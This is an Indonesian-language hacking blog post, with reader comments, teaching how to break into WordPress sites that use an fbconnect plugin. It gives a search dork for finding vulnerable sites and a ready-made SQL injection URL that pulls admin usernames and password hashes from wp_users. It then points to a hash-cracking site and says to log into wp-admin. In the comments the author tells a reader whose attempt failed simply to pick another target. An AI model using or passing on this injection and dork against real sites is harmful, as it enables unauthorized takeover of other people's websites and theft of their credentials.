Ops
Worlds
today : | at : | safemode : ON
> root / public_html / blogs /
name author perms com modified label

Exploit Wordpress Blogs admin rwxr-xr-x 4 13.00

Filename Exploit Wordpress Blogs
Permission rw-r--r--
Author admin
Date and Time 13.00
Label
Action

Dork: inurl:"fbconnect_action=myhome"



Klik situs Targetnya


Sekarang ubah URL :
?fbconnect_action=myhome&userid=

Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--


Sekarang keluar Username dan Password Admin.

 Encrypt Password MD5 (Blowfish) dengan 
http://hashchecker.de/find.html

Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php


4 komentar:

Anonim mengatakan...

ane coba ya den :) moga bisa

Anonim mengatakan...

den udah ane coba ehh tahap masuki url ini >> ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--


eh malah gak keluar tuh username nya den?

admin mengatakan...

@bimo96

kalo gitu cari target lain tandanya gak bisa di hacking ... emg susah kalo nyari targetnya :D

Unknown mengatakan...

baru newbie mohon bimbingannya
https://syaruni.blogspot.co.id/

Posting Komentar

 

Jayalah Indonesiaku © 2010 Ops on the Worlds